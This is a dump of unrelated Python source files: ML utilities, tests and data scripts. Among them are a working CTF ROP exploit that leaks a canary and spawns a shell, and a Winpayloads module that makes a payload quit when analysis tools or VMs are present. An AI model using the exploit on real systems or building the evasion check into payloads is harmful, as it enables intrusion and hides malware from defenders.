# Helpers for the other tests.
import torch
from torch._C import CompilationUnit
# RUN: %PYTHON %s
# Import TorchScript IR string as ScriptFunction.
def create_script_function(func_name, ts_ir_str):
cu = CompilationUnit()
return cu.create_function(func_name, torch._C.parse_ir(ts_ir_str))
|
openff/toolkit/utils/__init__.py
|
ijpulidos/openff-toolkit
| 120 |
117752
|
# General utilities for force fields
from openff.toolkit.utils.utils import * # isort:skip
from openff.toolkit.utils.toolkits import *
|
b01lersbootcampctf2020/goodbye_mr_anderson/exploit.py
|
nhtri2003gmail/ctf-write-ups
| 101 |
117766
|
#!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./leaks')
context.log_level = 'INFO'
if not args.REMOTE:
context.log_file = 'local.log'
p = process(binary.path)
else:
context.log_file = 'remote.log'
p = remote('chal.ctf.b01lers.com', 1009)
p.recvuntil('goodbye, Mr. Anderson.\n')
# binsh as name
p.sendline('8')
p.sendline('/bin/sh\0')
# leak base address
p.sendline('8')
p.sendline(8 * 'A')
p.recvline()
_ = p.recv(5)
_start = u64(b'\0' + _ + b'\0\0')
log.info('_start: ' + hex(_start))
binary.address = _start - binary.sym._start
log.info('binary.address: ' + hex(binary.address))
log.info('name ' + hex(binary.sym.name))
# leak canary
p.sendline('24')
p.sendline(24 * 'A')
p.recvline()
p.recvline()
_ = p.recv(7)
canary = u64(b'\0' + _)
log.info('canary: ' + hex(canary))
# get a shell
rop = ROP([binary])
pop_rdi = rop.find_gadget(['pop rdi','ret'])[0]
pop_rsi_r15 = rop.find_gadget(['pop rsi','pop r15','ret'])[0]
payload = 24 * b'A'
payload += p64(canary)
payload += p64(59)
payload += p64(pop_rdi)
payload += p64(binary.sym.name)
payload += p64(pop_rsi_r15)
payload += p64(0)
payload += p64(0)
payload += p64(binary.sym.yay)
p.sendline(str(len(payload)))
p.sendline(payload)
p.recvline()
p.recvline()
p.interactive()
|
utils/misc.py
|
niqbal996/ViewAL
| 126 |
117772
|
import numpy as np
from utils.colormaps import map_segmentation_to_colors
import constants
import os
import torch
def get_learning_rate(optimizer):
for param_group in optimizer.param_groups:
return param_group['lr']
def visualize_point_cloud(world_coordinates):
import open3d as o3d
xyz = np.transpose(world_coordinates)[:, :3]
pcd = o3d.geometry.PointCloud()
pcd.points = o3d.utility.Vector3dVector(xyz)
o3d.visualization.draw_geometries([pcd])
def turn_on_dropout(model):
if type(model) == torch.nn.Dropout2d:
model.train()
def visualize_entropy(image_normalized, entropy_map, prediction=None, ground_truth=None, valid_mask=None, weight_map=None, save=False, suffix='ent'):
import matplotlib
import matplotlib.pyplot as plt
from imageio import imwrite
if not image_normalized is None:
image_unnormalized = ((np.transpose(image_normalized, axes=[1, 2, 0]) * (0.229, 0.224, 0.225) + (0.485, 0.456, 0.406)) * 255).astype(np.uint8)
#norm = matplotlib.colors.Normalize(vmin=0, vmax=np.max(entropy_map), clip=False)
norm_ent = matplotlib.colors.Normalize(vmin=0, vmax=visualize_entropy.max_entropy, clip=False)
norm_weight = matplotlib.colors.Normalize(vmin=0, vmax=visualize_entropy.max_weight, clip=False)
plt.figure()
num_subplots = 2
if not prediction is None:
num_subplots += 1
if not ground_truth is None:
num_subplots += 1
if not valid_mask is None:
num_subplots += 1
if not weight_map is None:
num_subplots += 1
cur_subplot = 1
plt.title('display')
if not image_normalized is None:
plt.subplot(1, num_subplots, cur_subplot)
plt.imshow(image_unnormalized)
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'img_{visualize_entropy.save_idx:04d}.jpg'), image_unnormalized)
cur_subplot += 1
plt.subplot(1, num_subplots, cur_subplot)
cm_hot = matplotlib.cm.get_cmap('jet')
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'emap_{suffix}_{visualize_entropy.save_idx:04d}.png'), cm_hot(entropy_map / visualize_entropy.max_entropy))
plt.imshow(entropy_map, norm=norm_ent, cmap='jet')
cur_subplot += 1
if not prediction is None:
prediction_mapped = map_segmentation_to_colors(prediction.astype(np.uint8), 'scannet')
#imwrite(os.path.join(constants.RUNS, 'image_dumps', f'pred_0_{visualize_entropy.save_idx:04d}.png'), cm_hot(prediction))
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'pred_{visualize_entropy.save_idx:04d}.png'), prediction_mapped)
plt.subplot(1, num_subplots, cur_subplot)
cur_subplot += 1
plt.imshow(prediction_mapped)
if not ground_truth is None:
ground_truth = map_segmentation_to_colors(ground_truth.astype(np.uint8), 'scannet')
#imwrite(os.path.join(constants.RUNS, 'image_dumps', f'pred_0_{visualize_entropy.save_idx:04d}.png'), cm_hot(prediction))
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'gt_{visualize_entropy.save_idx:04d}.png'), ground_truth)
plt.subplot(1, num_subplots, cur_subplot)
cur_subplot += 1
plt.imshow(ground_truth)
if not valid_mask is None:
plt.subplot(1, num_subplots, cur_subplot)
cur_subplot += 1
plt.imshow(valid_mask)
if not weight_map is None:
plt.subplot(1, num_subplots, cur_subplot)
cur_subplot += 1
plt.imshow(weight_map, norm=norm_weight, cmap='jet')
plt.tight_layout()
if save:
plt.savefig(os.path.join(constants.RUNS, 'image_dumps', f'{visualize_entropy.save_idx:04d}_{suffix}.jpg'), bbox_inches='tight')
visualize_entropy.save_idx += 1
plt.close()
else:
plt.show(block=not save)
visualize_entropy.save_idx = 0
visualize_entropy.max_weight = 1
visualize_entropy.max_entropy = np.log2(40 / 2)
def visualize_vote_view_entropy(lmdb_handle, base_size, paths, indices_to_dataset, vote_entropy_scores, view_entropy_scores, scores):
from dataloader.paths import PathsDataset
dataset = PathsDataset(lmdb_handle, base_size, paths)
for i, j in zip(indices_to_dataset, range(len(indices_to_dataset))):
import matplotlib
import matplotlib.pyplot as plt
image_unnormalized = ((np.transpose(dataset[i]['image'].numpy(), axes=[1, 2, 0]) *
(0.229, 0.224, 0.225) + (0.485, 0.456, 0.406)) * 255).astype(np.uint8)
plt.figure()
plt.title('display')
plt.subplot(1, 4, 1)
plt.imshow(image_unnormalized)
plt.subplot(1, 4, 2)
norm_ent = matplotlib.colors.Normalize(vmin=0, vmax=visualize_entropy.max_entropy, clip=False)
plt.imshow(vote_entropy_scores[j, :, :], norm=norm_ent, cmap='jet')
plt.subplot(1, 4, 3)
plt.imshow(view_entropy_scores[j, :, :], norm=norm_ent, cmap='jet')
plt.subplot(1, 4, 4)
norm = matplotlib.colors.Normalize(vmin=np.min(scores[j]), vmax=np.max(scores[j]), clip=False)
plt.imshow(scores[j], norm=norm, cmap='jet')
plt.savefig(os.path.join(constants.RUNS, 'image_dumps', f'ent_{visualize_entropy.save_idx:04d}.png'), bbox_inches='tight')
visualize_entropy.save_idx += 1
plt.close()
plt.show(block=False)
def mark_boundaries(image_0, image_1, color=(0, 0, 0)):  # default color keeps the two-argument callers working
from scipy import ndimage
boundary_mask = np.ones_like(image_1)
for i in range(image_1.shape[0] - 1):
for j in range(image_1.shape[1] - 1):
if (image_1[i, j] != image_1[i, j + 1] or image_1[i, j] != image_1[i + 1, j]):
boundary_mask[i, j] = 0
boundary_mask = ndimage.binary_erosion(boundary_mask, structure=np.ones((2, 2))).astype(boundary_mask.dtype)
image_0[boundary_mask == 0, :] = color
return image_0
def visualize_spx_dataset(dataset_name, dataset):
import matplotlib.pyplot as plt
from tqdm import tqdm
from dataloader.indoor_scenes import IndoorScenesWithAllInfo
dataset.image_path_subset = sorted(dataset.image_path_subset)
spx_dataset = IndoorScenesWithAllInfo(dataset_name, dataset.lmdb_handle, "superpixel", (240, 320), dataset.image_path_subset)
for i in tqdm(range(len(dataset)), desc='Visualization'):
plt.figure(figsize=(16,8))
plt.title('spx')
plt.subplot(1, 2, 1)
image_unnormalized = ((np.transpose(dataset[i]['image'].numpy(), axes=[1, 2, 0]) * (0.229, 0.224, 0.225) + (0.485, 0.456, 0.406)) * 255)
image_unnormalized[dataset[i]['label'].numpy()==255, :] *= 0.5
image_unnormalized = image_unnormalized.astype(np.uint8)
image_unnormalized = mark_boundaries(image_unnormalized, spx_dataset[spx_dataset.image_path_subset.index(dataset.image_path_subset[i])]['superpixel'])
plt.imshow(image_unnormalized)
plt.subplot(1, 2, 2)
prediction_mapped = map_segmentation_to_colors(dataset[i]['label'].numpy().astype(np.uint8), dataset_name)
prediction_mapped = mark_boundaries(prediction_mapped, spx_dataset[spx_dataset.image_path_subset.index(dataset.image_path_subset[i])]['superpixel'])
plt.imshow(prediction_mapped)
plt.savefig(os.path.join(constants.RUNS, 'image_dumps', f'sel_{i:04d}.png'), bbox_inches='tight')
plt.close()
def visualize_numbered_superpixels(dataset_name, dataset):
import matplotlib.pyplot as plt
from tqdm import tqdm
from dataloader.indoor_scenes import IndoorScenesWithAllInfo
spx_dataset = IndoorScenesWithAllInfo(dataset_name, dataset.lmdb_handle, "superpixel_40", (240, 320), dataset.image_path_subset)
for i in tqdm(range(len(dataset)), desc='Visualization'):
for j in np.unique(spx_dataset[spx_dataset.image_path_subset.index(dataset.image_path_subset[i])]['superpixel']).tolist():
plt.figure(figsize=(16,8))
plt.title('spx')
plt.subplot(1, 2, 1)
image_unnormalized = ((np.transpose(dataset[i]['image'].numpy(), axes=[1, 2, 0]) * (0.229, 0.224, 0.225) + (0.485, 0.456, 0.406)) * 255).astype(np.uint8)
mask = spx_dataset[spx_dataset.image_path_subset.index(dataset.image_path_subset[i])]['superpixel']!=j
image_unnormalized = mark_boundaries(image_unnormalized, spx_dataset[spx_dataset.image_path_subset.index(dataset.image_path_subset[i])]['superpixel'], [255,255,255])
image_unnormalized[mask, :] = image_unnormalized[mask, :] // 2
plt.imshow(image_unnormalized)
plt.subplot(1, 2, 2)
prediction_mapped = map_segmentation_to_colors(dataset[i]['label'].numpy().astype(np.uint8), dataset_name)
prediction_mapped = mark_boundaries(prediction_mapped, spx_dataset[spx_dataset.image_path_subset.index(dataset.image_path_subset[i])]['superpixel'], [255,255,255])
prediction_mapped[mask, :] = prediction_mapped[mask, :] // 3
plt.imshow(prediction_mapped)
plt.savefig(os.path.join(constants.RUNS, 'image_dumps', f'{i:03d}_{j:03d}.png'), bbox_inches='tight')
plt.close()
def visualize_seedset_spx(dataset_name):
from dataloader import dataset_base
from dataloader.indoor_scenes import IndoorScenes
from torch.utils.data import DataLoader
lmdb_handle = dataset_base.LMDBHandle(os.path.join(constants.HDD_DATASET_ROOT, dataset_name, "dataset.lmdb"), False)
dataset = IndoorScenes(dataset_name, lmdb_handle, (240, 320), 'seedset_0')
paths = [f'scene0014_00_{i:06d}' for i in [1540]]
print(paths)
images = [u'{}'.format(x).encode('ascii') for x in paths]
dataset.image_path_subset = images
#visualize_spx_dataset(dataset_name, dataset)
visualize_numbered_superpixels(dataset_name, dataset)
def visualize_selection_spx(dataset_name, selections_path):
from dataloader import dataset_base
from dataloader.indoor_scenes import IndoorScenes, ActiveIndoorScenesRegional, IndoorScenesWithAllInfo
from torch.utils.data import DataLoader
lmdb_handle = dataset_base.LMDBHandle(os.path.join(constants.HDD_DATASET_ROOT, dataset_name, "dataset.lmdb"), False)
train_set = ActiveIndoorScenesRegional(dataset_name, lmdb_handle, (240, 320), 'seedset_0')
train_set.load_selections(os.path.join(constants.RUNS, dataset_name, selections_path, "selections"))
visualize_spx_dataset(dataset_name, train_set)
def _mark_boundaries(mask, output):
from scipy import ndimage
boundary_mask = np.ones_like(mask)
for i in range(mask.shape[0] - 1):
for j in range(mask.shape[1] - 1):
if (mask[i, j] != mask[i, j + 1] or mask[i, j] != mask[i + 1, j]):
boundary_mask[i, j] = 0
#output[i, j, :] = [0, 0, 0]
boundary_mask = ndimage.binary_erosion(boundary_mask, structure=np.ones((3, 3))).astype(boundary_mask.dtype)
output[boundary_mask == 0, :] = [0, 0, 0]
return output
def visualize_image_target_prediction(filename, image, target, random, random_loss, viewal, viewal_loss, full, full_loss):
from imageio import imwrite
import matplotlib
from PIL import Image
cm_hot = matplotlib.cm.get_cmap('jet')
image_unnormalized = ((np.transpose(image, axes=[1, 2, 0]) * (0.229, 0.224, 0.225) + (0.485, 0.456, 0.406)) * 255)
c0 = 0.60
c1 = 1 - c0
target_mapped = map_segmentation_to_colors(target.astype(np.uint8), 'scannet') * 255
target_mapped = _mark_boundaries(target, (c0 * target_mapped + c1 * image_unnormalized).astype(np.uint8))
random_mapped = map_segmentation_to_colors(random.astype(np.uint8), 'scannet') * 255
random_mapped = _mark_boundaries(random,(c0 * random_mapped + c1 * image_unnormalized).astype(np.uint8))
viewal_mapped = map_segmentation_to_colors(viewal.astype(np.uint8), 'scannet') * 255
viewal_mapped = _mark_boundaries(viewal,(c0 * viewal_mapped + c1 * image_unnormalized).astype(np.uint8))
full_mapped = map_segmentation_to_colors(full.astype(np.uint8), 'scannet') * 255
full_mapped = _mark_boundaries(full,(c0 * full_mapped + c1 * image_unnormalized).astype(np.uint8))
#hstacked = np.hstack((target_mapped, full_mapped, random_mapped, viewal_mapped))
normalizer = max(max(np.max(random_loss), np.max(viewal_loss)), np.max(full_loss)) / 1.5
#imwrite(os.path.join(constants.RUNS, 'image_dumps', f'{filename}.png'), hstacked)
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_im.png'), image_unnormalized)
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_tgt.png'), target_mapped)
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_rnd.png'), random_mapped)
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_rnd_loss.png'), cm_hot(random_loss/normalizer))
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_val.png'), viewal_mapped)
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_val_loss.png'), cm_hot(viewal_loss/normalizer))
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_ful.png'), full_mapped)
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_ful_loss.png'), cm_hot(full_loss/normalizer))
im_im = Image.open(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_im.png'))
im_tgt = Image.open(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_tgt.png'))
im_rnd = Image.open(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_rnd.png'))
im_val = Image.open(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_val.png'))
im_ful = Image.open(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_ful.png'))
im_rnd_loss = Image.open(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_rnd_loss.png'))
im_val_loss = Image.open(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_val_loss.png'))
im_ful_loss = Image.open(os.path.join(constants.RUNS, 'image_dumps', f'{filename}_ful_loss.png'))
margin_x = 5
margin_y = 5
x = 320
y = 240
final = Image.new('RGB', ((x+margin_x)*4 + 60, (y+margin_y)*2), (255,255,255))
final.paste(im_im, (margin_x//2, margin_y//2))
final.paste(im_rnd_loss, (60+margin_x//2+x+margin_x, margin_y//2))
final.paste(im_val_loss, (60+margin_x//2+(x+margin_x)*2, margin_y//2))
final.paste(im_ful_loss, (60+margin_x//2+(x+margin_x)*3, margin_y//2))
final.paste(im_tgt, (margin_x//2, y+margin_y+margin_y//2))
final.paste(im_rnd, (60+margin_x//2+x+margin_x, y+margin_y+margin_y//2))
final.paste(im_val, (60+margin_x//2+(x+margin_x)*2, y+margin_y+margin_y//2))
final.paste(im_ful, (60+margin_x//2+(x+margin_x)*3, y+margin_y+margin_y//2))
final.save(os.path.join(constants.RUNS, 'image_dumps', f'vis_{filename}.png'))
def visualize_image_target(image, target):
from imageio import imwrite
image_unnormalized = ((np.transpose(image, axes=[1, 2, 0]) * (0.229, 0.224, 0.225) + (0.485, 0.456, 0.406)) * 255).astype(np.uint8)
target_mapped = (map_segmentation_to_colors(target.astype(np.uint8), 'matterport') * 255).astype(np.uint8)
imwrite(os.path.join(constants.RUNS, 'image_dumps', f'{visualize_entropy.save_idx:04d}.png'), np.hstack((image_unnormalized, target_mapped)))
visualize_entropy.save_idx += 1
def visualize_gt(dataset_name):
from dataloader import dataset_base
from dataloader.indoor_scenes import IndoorScenes
from torch.utils.data import DataLoader
import random
lmdb_handle = dataset_base.LMDBHandle(os.path.join(constants.HDD_DATASET_ROOT, dataset_name, "dataset.lmdb"), False)
train_set = IndoorScenes(dataset_name, lmdb_handle, (240, 320), 'train')
ctr = 0
list_of_indices = list(range(len(train_set)))
random.shuffle(list_of_indices)
for i in list_of_indices:
sample = train_set[i]
visualize_image_target(sample['image'].numpy(), sample['label'].numpy())
ctr+=1
if ctr==1000:
break
|
lib/sandbox/python/check_all_process_names.py
|
Azh4rR31gn5/Winpayloads
| 1,382 |
117810
|
<filename>lib/sandbox/python/check_all_process_names.py
#
# Checks all loaded process names, Python
# Module written by <NAME>
# Website: arvanaghi.com
# Twitter: @arvanaghi
# Edited for use in winpayloads
import win32pdh
import sys
EvidenceOfSandbox = []
sandboxProcesses = "vmsrvc", "tcpview", "wireshark", "visual basic", "fiddler", "vmware", "vbox", "process explorer", "autoit", "vboxtray", "vmtools", "vmrawdsk", "vmusbmouse", "vmvss", "vmscsi", "vmxnet", "vmx_svga", "vmmemctl", "df5serv", "vboxservice", "vmhgfs"
_, runningProcesses = win32pdh.EnumObjectItems(None,None,'process', win32pdh.PERF_DETAIL_WIZARD)
for process in runningProcesses:
for sandboxProcess in sandboxProcesses:
if sandboxProcess in str(process):
if process not in EvidenceOfSandbox:
EvidenceOfSandbox.append(process)
break
if EvidenceOfSandbox:
    sys.exit()
|
deep_qa/training/losses.py
|
richarajpal/deep_qa
| 459 |
117812
|
<gh_stars>100-1000
from keras import backend as K
from ..tensors.backend import VERY_NEGATIVE_NUMBER, VERY_LARGE_NUMBER
def ranking_loss(y_pred, y_true):
"""
Using this loss trains the model to give scores to all correct elements in y_true that are
higher than all scores it gives to incorrect elements in y_true.
For example, let ``y_true = [0, 0, 1, 1, 0]``, and let ``y_pred = [-1, 1, 2, 0, -2]``. We will
find the lowest score assigned to correct elements in ``y_true`` (``0`` in this case), and the
highest score assigned to incorrect elements in ``y_true`` (``1`` in this case). We will then
compute a sigmoided loss given these values: ``-K.sigmoid(0 - 1)`` (we're minimizing the loss,
so the negative sign in front of the sigmoid means we want the correct element to have a higher
score than the incorrect element).
Note that the way we do this uses ``K.max()`` and ``K.min()`` over the elements in ``y_true``,
which means that if you have a lot of values in here, you'll only get gradients backpropping
through two of them (the ones on the margin). This could be an inefficient use of your
computation time. Think carefully about the data that you're using with this loss function.
Because of the way masking works with Keras loss functions, also, you need to be sure that any
masked elements in ``y_pred`` have very negative values before they get passed into this loss
function.
"""
correct_elements = y_pred + (1.0 - y_true) * VERY_LARGE_NUMBER
lowest_scoring_correct = K.min(correct_elements, axis=-1)
incorrect_elements = y_pred + y_true * VERY_NEGATIVE_NUMBER
highest_scoring_incorrect = K.max(incorrect_elements, axis=-1)
return K.mean(-K.sigmoid(lowest_scoring_correct - highest_scoring_incorrect))
def ranking_loss_with_margin(y_pred, y_true):
"""
Using this loss trains the model to give scores to all correct elements in y_true that are
higher than all scores it gives to incorrect elements in y_true, plus a margin.
For example, let ``y_true = [0, 0, 1, 1, 0]``, and let ``y_pred = [-1, 1, 2, 0, -2]``. We will
find the lowest score assigned to correct elements in ``y_true`` (``0`` in this case), and the
highest score assigned to incorrect elements in ``y_true`` (``1`` in this case). We will then
compute a hinge loss given these values: ``K.maximum(0.0, 1 + 1 - 0)``.
Note that the way we do this uses ``K.max()`` and ``K.min()`` over the elements in ``y_true``,
which means that if you have a lot of values in here, you'll only get gradients backpropping
through two of them (the ones on the margin). This could be an inefficient use of your
computation time. Think carefully about the data that you're using with this loss function.
Because of the way masking works with Keras loss functions, also, you need to be sure that any
masked elements in ``y_pred`` have very negative values before they get passed into this loss
function.
"""
correct_elements = y_pred + (1.0 - y_true) * VERY_LARGE_NUMBER
lowest_scoring_correct = K.min(correct_elements, axis=-1)
incorrect_elements = y_pred + y_true * VERY_NEGATIVE_NUMBER
highest_scoring_incorrect = K.max(incorrect_elements, axis=-1)
return K.mean(K.maximum(0.0, 1.0 + highest_scoring_incorrect - lowest_scoring_correct))
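if __name__ == "__main__":
    # Sanity check of the docstring example (assumes a working Keras backend;
    # this block is not part of the original deep_qa module).
    y_pred = K.variable([[-1.0, 1.0, 2.0, 0.0, -2.0]])
    y_true = K.variable([[0.0, 0.0, 1.0, 1.0, 0.0]])
    print(K.eval(ranking_loss(y_pred, y_true)))              # ~ -0.269 = -sigmoid(0 - 1)
    print(K.eval(ranking_loss_with_margin(y_pred, y_true)))  # 2.0 = max(0, 1 + 1 - 0)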
|
dpwn/models/semantic_cnn.py
|
macdaliot/deep-pwning
| 557 |
117821
|
<filename>dpwn/models/semantic_cnn.py
import tensorflow as tf
import utils.utils as utils
class SemanticCNN:
def __init__(self, config,
sequence_length, vocab_size, embedding_size, num_filters):
self.config = config
self.sequence_length = sequence_length
self.vocab_size = vocab_size
self.embedding_size = embedding_size
self.num_filters = num_filters
if config.get('main', 'seed') == 'None':
self.seed = None
else:
self.seed = config.getint('main', 'seed')
def conv2d(self, data, weight):
return tf.nn.conv2d(data,
weight,
strides=[1, 1, 1, 1],
padding='VALID')
def max_pool(self, data, filter_size):
return tf.nn.max_pool(data,
ksize=[1, self.sequence_length - filter_size + 1, 1, 1],
strides=[1, 1, 1, 1],
padding='VALID')
def variable(self, flavor, shape):
if flavor == 'W_truncated_normal':
return tf.Variable(
tf.truncated_normal(shape,
stddev=0.1,
seed=self.seed,
dtype=tf.float32))
elif flavor == 'W_random_uniform':
return tf.Variable(
tf.random_uniform(shape,
minval=-1.0,
maxval=1.0))
elif flavor == 'b':
return tf.Variable(tf.constant(0.1, shape=shape),
dtype=tf.float32)
else:
return None
def train_input_placeholders(self):
x = tf.placeholder(tf.float32,
shape=[None, self.sequence_length],
name="x")
y_ = tf.placeholder(tf.float32,
[None, self.config.getint('main', 'num_classes')], name="y_")
return x, y_
def model(self, data):
l2_loss = tf.constant(0.0)
keep_prob = tf.placeholder(tf.float32, name="keep_prob")
embed_W = self.variable('W_random_uniform', [self.vocab_size, self.embedding_size])
embedded_words = tf.nn.embedding_lookup(embed_W, tf.cast(data, tf.int32))
embedded_words_expanded = tf.expand_dims(embedded_words, -1)
filter3_shape = [3, self.embedding_size, 1, self.num_filters]
pool_filter3_W = self.variable('W_truncated_normal', filter3_shape)
pool_filter3_b = self.variable('b', [self.num_filters])
conv1 = tf.nn.relu(tf.nn.bias_add(
self.conv2d(embedded_words_expanded, pool_filter3_W), pool_filter3_b))
pool_filter3 = self.max_pool(conv1, 3)
filter4_shape = [4, self.embedding_size, 1, self.num_filters]
pool_filter4_W = self.variable('W_truncated_normal', filter4_shape)
pool_filter4_b = self.variable('b', [self.num_filters])
conv2 = tf.nn.relu(tf.nn.bias_add(
self.conv2d(embedded_words_expanded, pool_filter4_W), pool_filter4_b))
pool_filter4 = self.max_pool(conv2, 4)
filter5_shape = [5, self.embedding_size, 1, self.num_filters]
pool_filter5_W = self.variable('W_truncated_normal', filter5_shape)
pool_filter5_b = self.variable('b', [self.num_filters])
conv3 = tf.nn.relu(tf.nn.bias_add(
self.conv2d(embedded_words_expanded, pool_filter5_W), pool_filter5_b))
pool_filter5 = self.max_pool(conv3, 5)
pool_combined = tf.concat(3, [pool_filter3, pool_filter4, pool_filter5])
pool_final = tf.reshape(pool_combined, [-1, self.num_filters * 3])
dropout = tf.nn.dropout(pool_final, keep_prob)
final_W = tf.get_variable("W", shape=[self.num_filters * 3,
self.config.getint('main', 'num_classes')],
initializer=tf.contrib.layers.xavier_initializer())
final_b = tf.Variable(tf.constant(0.1,
shape=[self.config.getint('main', 'num_classes')]), name="b")
logits = tf.matmul(dropout, final_W) + final_b
y_conv = tf.nn.softmax(logits)
l2_loss += tf.nn.l2_loss(final_W) + tf.nn.l2_loss(final_b)
return y_conv, logits, keep_prob, l2_loss, embedded_words, embed_W
|
tests/test_config.py
|
nikhil153/codecarbon
| 346 |
117822
|
import os
import unittest
from textwrap import dedent
from unittest import mock
from unittest.mock import patch
from codecarbon.core.config import (
clean_env_key,
get_hierarchical_config,
parse_env_config,
parse_gpu_ids,
)
from codecarbon.emissions_tracker import EmissionsTracker
from tests.testutils import get_custom_mock_open
class TestConfig(unittest.TestCase):
def test_clean_env_key(self):
for key in [1, None, 0.2, [], set()]:
with self.assertRaises(AssertionError):
clean_env_key(key)
for (key, target) in [
("", ""),
("USER", "user"),
("CODECARBON_TEST", "test"),
("CODECARBON_TEST_VALUE", "test_value"),
("CODECARBON_TEST_1", "test_1"),
("CODECARBON_1", "1"),
]:
self.assertEqual(clean_env_key(key), target)
def test_parse_gpu_ids(self):
for (ids, target) in [
("0,1,2", [0, 1, 2]),
("[0, 1, 2", [0, 1, 2]),
("(0, 1, 2)", [0, 1, 2]),
("[1]", [1]),
("1", [1]),
("0", [0]),
("", []),
(1, 1),
]:
self.assertEqual(parse_gpu_ids(ids), target)
@mock.patch.dict(
os.environ,
{
"USER": "yes",
"CODECARBON_TEST": "test-VALUE",
"CODECARBON_TEST_KEY": "this_other_value",
},
)
def test_parse_env_config(self):
self.assertDictEqual(
parse_env_config(),
{"codecarbon": {"test": "test-VALUE", "test_key": "this_other_value"}},
)
def test_read_confs(self):
global_conf = dedent(
"""\
[codecarbon]
no_overwrite=path/to/somewhere
local_overwrite=ERROR:not overwritten
syntax_test_key= no/space= problem2
"""
)
local_conf = dedent(
"""\
[codecarbon]
local_overwrite=SUCCESS:overwritten
local_new_key=cool value
"""
)
with patch(
"builtins.open", new_callable=get_custom_mock_open(global_conf, local_conf)
):
conf = dict(get_hierarchical_config())
target = {
"no_overwrite": "path/to/somewhere",
"local_overwrite": "SUCCESS:overwritten",
"syntax_test_key": "no/space= problem2",
"local_new_key": "cool value",
}
self.assertDictEqual(conf, target)
@mock.patch.dict(
os.environ,
{
"USER": "useless key",
"CODECARBON_ENV_OVERWRITE": "SUCCESS:overwritten",
"CODECARBON_ENV_NEW_KEY": "cool value",
},
)
def test_read_confs_and_parse_envs(self):
global_conf = dedent(
"""\
[codecarbon]
no_overwrite=path/to/somewhere
local_overwrite=ERROR:not overwritten
syntax_test_key= no/space= problem2
env_overwrite=ERROR:not overwritten
"""
)
local_conf = dedent(
"""\
[codecarbon]
local_overwrite=SUCCESS:overwritten
local_new_key=cool value
env_overwrite=ERROR:not overwritten
"""
)
with patch(
"builtins.open", new_callable=get_custom_mock_open(global_conf, local_conf)
):
conf = dict(get_hierarchical_config())
target = {
"no_overwrite": "path/to/somewhere",
"local_overwrite": "SUCCESS:overwritten",
"env_overwrite": "SUCCESS:overwritten",
"syntax_test_key": "no/space= problem2",
"local_new_key": "cool value",
"env_new_key": "cool value",
}
self.assertDictEqual(conf, target)
def test_empty_conf(self):
global_conf = ""
local_conf = ""
with patch(
"builtins.open", new_callable=get_custom_mock_open(global_conf, local_conf)
):
conf = dict(get_hierarchical_config())
target = {}
self.assertDictEqual(conf, target)
@mock.patch.dict(
os.environ,
{
"CODECARBON_SAVE_TO_FILE": "true",
"CODECARBON_GPU_IDS": "0, 1",
"CODECARBON_PROJECT_NAME": "ERROR:not overwritten",
},
)
def test_full_hierarchy(self):
global_conf = dedent(
"""\
[codecarbon]
measure_power_secs=10
output_dir=ERROR:not overwritten
save_to_file=ERROR:not overwritten
"""
)
local_conf = dedent(
"""\
[codecarbon]
output_dir=/success/overwritten
emissions_endpoint=http://testhost:2000
gpu_ids=ERROR:not overwritten
"""
)
with patch(
"builtins.open", new_callable=get_custom_mock_open(global_conf, local_conf)
):
tracker = EmissionsTracker(
project_name="test-project", co2_signal_api_token="signal-token"
)
self.assertEqual(tracker._measure_power_secs, 10)
self.assertEqual(tracker._output_dir, "/success/overwritten")
self.assertEqual(tracker._emissions_endpoint, "http://testhost:2000")
self.assertEqual(tracker._gpu_ids, [0, 1])
self.assertEqual(tracker._co2_signal_api_token, "signal-token")
self.assertEqual(tracker._project_name, "test-project")
self.assertTrue(tracker._save_to_file)
|
tests/bitcoin/gen_test_inputs.py
|
febuiles/two1-python
| 415 |
117867
|
import json
import os
import random
import requests
import sys
import time
CHAIN_API_KEY = os.environ.get('CHAIN_API_KEY', None)
CHAIN_API_SECRET = os.environ.get('CHAIN_API_SECRET', None)
def get_from_chain(url_adder):
url = 'https://api.chain.com/v2/bitcoin/%s' % (url_adder)
ok = False
while not ok:
try:
r = requests.get(url, auth=(CHAIN_API_KEY, CHAIN_API_SECRET))
r.raise_for_status()
ok = True
except requests.HTTPError as e:
if r.status_code == 429: # Too many requests
time.sleep(1)
else:
print("Request was to %s" % (url))
raise e
b = json.loads(r.text)
return b
def get_block(block):
''' block can be: a hash, index or "latest" '''
return get_from_chain("blocks/%s" % (block))
def get_txn(tx):
tx_json = _get_txn(tx)
raw_txn = _get_txn(tx_json['hash'], True)
tx_json['hex'] = raw_txn['hex']
return tx_json
def _get_txn(tx, raw=False):
url_adder = "transactions/%s" % (tx)
if raw:
url_adder += '/hex'
return get_from_chain(url_adder)
if __name__ == "__main__":
last_block_index = get_block("latest")['height']
print("last_block_index = %d" % (last_block_index))
num_txns = 2500
full_blocks = 50
block_indices = [random.randrange(0, last_block_index) for i in range(num_txns)]
txns = []
special_txns = ["52759f4ed9bf231014f040c7d0329e783aaa93cf973136d131b0cd55b9bf45cf",
"39409570293e8ec38970b0da814cbb826e75501036ac2f42836859b3ac8120ea",
"a258709e0f21a2cfdf053c3ee08b547dee1574179fbb964b37a43c7cd37c5f74"]
for tx_hash in special_txns:
tx = get_txn(tx_hash)
txns.append(tx)
blocks = []
blocks_grabbed = 0
for bi in block_indices:
b = get_block(bi)
if blocks_grabbed < full_blocks:
blocks.append(b)
# Grab all the txns in this block
for t, txn_hash in enumerate(b['transaction_hashes']):
